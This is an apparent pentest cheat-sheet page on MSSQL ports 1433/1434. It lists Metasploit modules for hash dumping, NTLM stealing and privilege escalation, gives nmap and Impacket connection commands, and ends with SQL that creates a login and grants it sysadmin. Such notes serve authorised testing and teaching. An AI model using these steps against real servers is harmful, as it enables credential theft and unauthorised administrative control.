Port 1433/1434 - MSSQL

MSSQL

Microsoft SQL Server (MSSQL) often exposes two ports:

  1. 1433 - Used by clients to interact with the database

  2. 1434 - Used to list available instances (a Server can run multiple instances on high ports)

Default credentials are often set to sa:sa, which sa equivalent to Sysadmin.

MSSQL Scanning and Enumeration

Tool
Script/Module
Auth
MITRE ATT&CK Tactic
Command

MSF

mssql_enum

?

Reconnaissance

MSF

mssql_ping

?

Reconnaissance

Nmap

ms-sql-info

N

Reconnaissance

sudo nmap -A -p 1433,1434 -n 10.10.10.10

MSSQL Exploitation

Tool
Script/Module
Auth
MITRE ATT&CK Tactic
Command

MSF

mssql_escalate_dbowner mssql_escalate_escalate_as

Y

Privilege Escalation

MSF

mssql_hashdump

Y

Credential Access

MSF

mssql_idf

Y

Discovery

MSF

mssql_local_auth_bypass

Y

Persistence Privilege Escalation

MSF

mssql_ntlm_stealer

Y

Credential Access

MSF

mssql_payload

Y

Execution

MSF

mssql_sql_file

Y

Execution

MSSQL Database Interaction

the mssqlclient.py python tool that comes pre-installed on Kali Linux as part of the Impacket suite, can be used to interact with a remote MSSQL server.

# Connecting to a Remote MSSQL Server (Requires Database selection, Domain, Username, Password, and IP address entry.)
mssqlclient.py -db %DATABASE% -windows-auth %DOMAIN%/%USERNAME%:%PASSWORD%@%IP%

# Database Enumeration
SELECT * from %TABLE% # Show all stored data under a select table
SELECT * FROM %DATABASE%.INFORMATION_SCHEMA.TABLES; # Show tables under a select database

# Exploitation
CREATE LOGIN &USERNAME% WITH PASSWORD = '&PASSWORD%' # Create a new user and assign sysadmin privileges
sp_addsrvrolemember '%USERNAME%', 'sysadmin'
PreviousDatabasesNextPort 3306 - MySQL/MariaDB

Last updated